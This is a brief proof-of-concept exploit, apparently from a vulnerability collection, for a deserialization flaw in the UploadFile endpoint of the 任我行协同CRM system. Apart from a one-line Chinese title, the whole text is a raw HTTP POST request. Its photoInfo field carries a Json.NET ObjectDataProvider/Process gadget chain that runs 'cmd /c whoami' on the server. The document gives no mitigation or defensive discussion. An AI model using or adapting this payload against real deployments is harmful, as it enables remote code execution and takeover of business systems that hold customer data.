任我行协同CRM系统UploadFile存在反序列化漏洞 POST /SystemManage /UploadFile HTTP /1.1
Host : {{Hostname }}
Accept -Language : zh -CN ,zh ;q =0.8 ,zh -TW ;q =0.7 ,zh -HK ;q =0.5 ,en -US ;q =0.3 ,en ;q =0.2
Upgrade -Insecure -Requests : 1
User -Agent : Mozilla /5.0 (Windows NT 10.0 ; Win64 ; x64 ) AppleWebKit /537.36 (KHTML , like
Gecko ) Chrome /83.0 .4103 .116 Safari /537.36
Accept :
text /html ,application /xhtml +xml ,application /xml ;q =0.9 ,image /avif ,image /webp ,*/*;q =0.8
Accept -Encoding : gzip , deflate
Content -Type : application /x -www -form -urlencoded
photoInfo ={
'$type' :'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' , 'MethodName' :'Start' , 'MethodParameters' :{
'$type' :'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' , '$values' :['cmd' , '/c whoami' ]
},'ObjectInstance' :{'$type' :'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' }
}